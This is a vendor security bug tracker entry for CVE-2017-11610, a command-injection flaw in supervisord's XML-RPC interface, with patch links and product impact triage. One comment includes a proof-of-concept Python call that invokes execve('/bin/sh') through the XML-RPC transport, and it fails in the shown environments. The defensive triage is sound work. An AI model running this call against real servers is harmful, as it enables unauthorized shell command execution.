Bug 1476143 (CVE-2017-11610) - CVE-2017-11610 supervisor: Command injection via malicious XML-RPC request
Summary: CVE-2017-11610 supervisor: Command injection via malicious XML-RPC request
Status: NEW
Alias: CVE-2017-11610
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
medium
medium
Target Milestone: ---
Assignee: Red Hat Product Security
QA Contact:
URL:
Whiteboard: impact=moderate,public=20170724,repor...
Keywords: Security
Depends On: 1476145 1476144 1476286 1476287 1476355 1476356 1477924
Blocks: 1476147
TreeView+ depends on / blocked
 
Reported: 2017-07-28 06:57 UTC by Andrej Nemec
Modified: 2019-04-22 21:32 UTC (History)
25 users (show)

(edit)
A vulnerability was found in the XML-RPC interface in supervisord. When processing malformed commands, an attacker can cause arbitrary shell commands to be executed on the server as the same user as supervisord. Exploitation requires the attacker to first be authenticated to the supervisord service.
Clone Of:
(edit)
Last Closed:


Attachments (Terms of Use)


External Trackers
Tracker ID Priority Status Summary Last Updated
Red Hat Product Errata RHSA-2017:3005 normal SHIPPED_LIVE Important: Red Hat CloudForms security, bug fix, and enhancement update 2017-10-24 04:15:49 UTC

Description Andrej Nemec 2017-07-28 06:57:02 UTC
 A vulnerability has been found where an authenticated client can send a malicious XML-RPC request to supervisord that will run arbitrary shell commands on the server. The commands will be run as the same user as supervisord. Depending on how supervisord has been configured, this may be root.

Upstream issue:

https://github.com/Supervisor/supervisor/issues/964

Upstream patches:

3.3.3 https://github.com/Supervisor/supervisor/commit/058f46141e346b18dee0497ba11203cb81ecb19e
3.2.4 https://github.com/Supervisor/supervisor/commit/aac3c21893cab7361f5c35c8e20341b298f6462e
3.1.4 https://github.com/Supervisor/supervisor/commit/dbe0f55871a122eac75760aef511efc3a8830b88
3.0.1 https://github.com/Supervisor/supervisor/commit/83060f3383ebd26add094398174f1de34cf7b7f0

Comment 1 Andrej Nemec 2017-07-28 06:57:27 UTC
Created supervisor tracking bugs for this issue:

Affects: epel-all [bug 1476145]
Affects: fedora-all [bug 1476144]

Comment 2 Siddharth Sharma 2017-07-28 10:49:10 UTC
Analysis:

Default install on Red Hat Ceph Storage does not run any service on port 9001 and does not accept connection. 

~]$ python2
Python 2.7.5 (default, Aug  2 2016, 04:20:16) 
[GCC 4.8.5 20150623 (Red Hat 4.8.5-4)] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> from xmlrpclib import ServerProxy
>>> from supervisor.xmlrpc import SupervisorTransport
>>> server = ServerProxy('http://127.0.0.1/RPC2', SupervisorTransport('', '', 'unix:///var/tmp/supervisord.sock'))
>>> server.supervisor.supervisord.options.execve('/bin/sh', [], {})
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "/usr/lib64/python2.7/xmlrpclib.py", line 1233, in __call__
    return self.__send(self.__name, args)
  File "/usr/lib64/python2.7/xmlrpclib.py", line 1587, in __request
    verbose=self.__verbose
  File "/usr/lib/python2.7/site-packages/supervisor/xmlrpc.py", line 460, in request
    self.connection.request('POST', handler, request_body, self.headers)
  File "/usr/lib64/python2.7/httplib.py", line 1017, in request
    self._send_request(method, url, body, headers)
  File "/usr/lib64/python2.7/httplib.py", line 1051, in _send_request
    self.endheaders(body)
  File "/usr/lib64/python2.7/httplib.py", line 1013, in endheaders
    self._send_output(message_body)
  File "/usr/lib64/python2.7/httplib.py", line 864, in _send_output
    self.send(msg)
  File "/usr/lib64/python2.7/httplib.py", line 826, in send
    self.connect()
  File "/usr/lib/python2.7/site-packages/supervisor/xmlrpc.py", line 481, in connect
    self.sock.connect(self.socketfile)
  File "/usr/lib64/python2.7/socket.py", line 224, in meth
    return getattr(self._sock,name)(*args)
socket.error: [Errno 2] No such file or directory

supervisor package is used by calamari which uses following configuration in default install 

~]# vi /etc/supervisor/conf.d/calamari.conf

[supervisord]
loglevel=warn
logfile=/var/log/calamari/supervisord.log
childlogdir=/var/log/calamari

[program:carbon-cache]
command=/opt/calamari/venv/bin/carbon-cache.py --debug --config /etc/graphite/carbon.conf start

[program:cthulhu]
command=/opt/calamari/venv/bin/cthulhu-manager
stderr_logfile = /var/log/calamari/cthulhu_stderr.log
stdout_logfile = /var/log/calamari/cthulhu_stdout.log


http server is not enabled
~]# vi /etc/supervisord.conf 
;[inet_http_server]         ; inet (TCP) server disabled by default
;port=127.0.0.1:9001        ; (ip_address:port specifier, *:port for all iface)


1. If server is enabled is enabled (manually enabling server)
INFO RPC interface 'supervisor' initialized
CRIT Server 'inet_http_server' running without any HTTP authentication checking
INFO supervisord started with pid 23888
TRAC XML-RPC method called: supervisor.supervisord.options.execve()


2. with unix domain socket:

>>> from xmlrpclib import ServerProxy
>>> from supervisor.xmlrpc import SupervisorTransport
>>> server = ServerProxy('http://127.0.0.1/RPC2',SupervisorTransport('', '', 'unix:///tmp/supervisord.sock'))
>>> server.supervisor.supervisord.options.execve('/bin/sh', [], {})
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "/usr/lib64/python2.7/xmlrpclib.py", line 1233, in __call__
    return self.__send(self.__name, args)
  File "/usr/lib64/python2.7/xmlrpclib.py", line 1587, in __request
    verbose=self.__verbose
  File "/usr/lib/python2.7/site-packages/supervisor/xmlrpc.py", line 460, in request
    self.connection.request('POST', handler, request_body, self.headers)
  File "/usr/lib64/python2.7/httplib.py", line 1017, in request
    self._send_request(method, url, body, headers)
  File "/usr/lib64/python2.7/httplib.py", line 1051, in _send_request
    self.endheaders(body)
  File "/usr/lib64/python2.7/httplib.py", line 1013, in endheaders
    self._send_output(message_body)
  File "/usr/lib64/python2.7/httplib.py", line 864, in _send_output
    self.send(msg)
  File "/usr/lib64/python2.7/httplib.py", line 826, in send
    self.connect()
  File "/usr/lib/python2.7/site-packages/supervisor/xmlrpc.py", line 481, in connect
    self.sock.connect(self.socketfile)
  File "/usr/lib64/python2.7/socket.py", line 224, in meth
    return getattr(self._sock,name)(*args)
socket.error: [Errno 13] Permission denied

Comment 5 Jason Shepherd 2017-07-31 04:32:12 UTC
Supervisor is used by the Nagios componet of RHMAP. In the supervisor configuration the XMLRPC plugin is not enabled. Also the Nagios images only exposes port 8080 (httpd), not (9001) XMLRPC network port.

Marking RHMAP as not affected.

Comment 6 Kurt Seifried 2017-07-31 12:02:23 UTC
Updated CVSSv3 score to reflect the fact that while several products use this component they do not expose he supervisor service to the network by default. Downgrading to medium because of this and the fact that these products also do not have local untrusted user accounts.

Comment 8 errata-xmlrpc 2017-10-24 00:42:45 UTC
This issue has been addressed in the following products:

  CloudForms Management Engine 5.8

Via RHSA-2017:3005 https://access.redhat.com/errata/RHSA-2017:3005


Note You need to log in before you can comment on or make changes to this bug.